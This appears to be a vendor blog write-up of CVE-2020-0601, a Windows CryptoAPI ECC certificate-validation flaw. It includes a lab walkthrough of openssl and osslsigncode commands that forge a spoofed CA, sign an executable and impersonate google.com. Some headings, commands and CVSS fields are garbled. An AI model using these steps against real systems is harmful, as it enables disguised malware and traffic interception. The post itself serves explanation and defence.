Vulnerability Details:
A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.
ECC relies on different parameters. These parameters are standardized for many curves. However, system didn’t check all these parameters. The parameter G (the generator) was not checked, and the attacker can therefore supply their own generator, such that when system tries to validate the certificate against a trusted CA, it’ll only look for matching public keys, and then use the generator of the certificate.
In order to yield the same public key to spoof the certificate, private key is set to 1
public Key = Private Key * Generator
Public Key = Generator
Trusted public key is used as the generator of spoofing certificate; Generator is not validated by system
MicrosoftECCProductRootCertificateAuthority.cer is by default a trusted root certificate authority (CA) using ECConWindows10. Anything signed with this certificate will therefore automatically be trusted.
CVSS v3:
Base Code 5.8
Confidentiality Impact Partial
Integrity Impact Partial
Access Complexity Medium
Authentication not required
Availability Impact non
Mitigation:
Microsoft Windows 2020 updates had been released to patch CVE-2020-0601 vulnerability.
Major Impacted Browsers:
Windows 10: Version 1607
Windows 10 Version 1709
Windows 10 Version 1803
Windows 10 Version 1809
Windows 10 Version 1903
Windows 10 Version 1909
Windows Server 2016-
Windows Server 2016 Version 1803
Windows Server 2016 Version 1903
Windows Server 2016 Version 1909
Windows Server 2019-
Exploitation:
Files location – https://packetstormsecurity.com/files/author/14686
Extract the public key from the trusted CA
ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cerGenerate a new x509 certificate based on this key. This will be spoofed CA
openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
Generate a new key. It will be used to create a code signing certificate, which we will sign with our own CA
openssl ecparam -name secp384r1 -genkey -noout -out cert.keyNext, create a new certificate signing request (CSR)
openssl req -new -key cert.key -out cert.csr -config openssl_tls.conf -reqexts v3_tlsSign new CSR with spoofed CA and CA key. This certificate will expire in 2047, whereas the real trusted Microsoft CA will expire in 2043.
ope
openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key –CAcreateserial
-out cert.crt -days 10000 -extfileopenssl_tls.conf -extensions v3_tls
Pack the certificate, its key and the spoofed CA into a PKCS12 file for signing executables
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code
Signing" -out cert.p12
Sign your executable with PKCS12 file
osslsigncode sign -pkcs12 cert.p12 -n "Signed" -in 7z1900-x64.exe -out 7z1900- x64_signed.exe
In windows VM, navigate to C:\Windows\System32\drivers\etc\hosts
Add IP address of Ubuntu VM and URL - https://www.google.com
Files cert.crt, cert.key, and spoofed_ca.crt are used to serve content. Add the spoofed_ca.crt as a certificate chain in your server’s HTTPS configuration. Configure “index.js” server file.
Server is started in Ubuntu VM
In Windows VM, open browser and navigate to https://www.google.com.
Error - “Your connection isn’t private” is displayed
Check certificate information. It is changed to the details of the spoofed certificate
The CA Root certificate is not trusted because it is not in the Trusted Root Certification Authorities store
Export the certificate
Install the spoofed certificate in Trusted Root Certification Authorities
Spoofed Certificate is in Trusted Root Certification Authorities
Open Browser – Internet Explorer and navigate to https://www.google.com
Spoofed CA is validated by web browser as Trusted Root CA and original https://www.google.comcontent is replaced with the incorrect information as mentioned in “index.js” file.
CVE-2020-0601 – Windows incorrect ECC certificate validation vulnerability is implemented
Reference:
– https://nvd.nist.gov/vuln/detail/CVE-2020-0601
– https://packetstormsecurity.com/files/author/14686/
– github.com-ollypwn-CVE-2020-0601_-_2020-01-17_10-09-11
#CryptoAPI #webbrowser #microsoft #certificate #certificatevalidation #CVE-2020-0601
About Version 2 Digital
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.
